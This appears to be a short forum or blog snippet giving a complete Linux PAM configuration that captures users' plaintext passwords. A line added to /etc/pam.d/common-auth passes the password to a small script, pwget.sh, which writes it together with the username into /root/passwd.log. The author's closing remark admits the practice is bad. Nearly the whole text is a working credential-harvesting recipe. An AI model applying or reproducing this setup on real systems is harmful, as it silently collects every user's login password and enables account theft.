• /etc/pam.d/common-auth
# add this line at the end
auth required pam_exec.so expose_authtok log=/root/passwd.log /root/bin/pwget.sh
  • /root/bin/pwget.sh
#!/bin/bash
/bin/cat
/bin/echo :$PAM_USER
chmod 700 /root/bin/pwget.sh 

YES, I KNOW ITS BAD, ITS BAD, ITS BAD ... :-)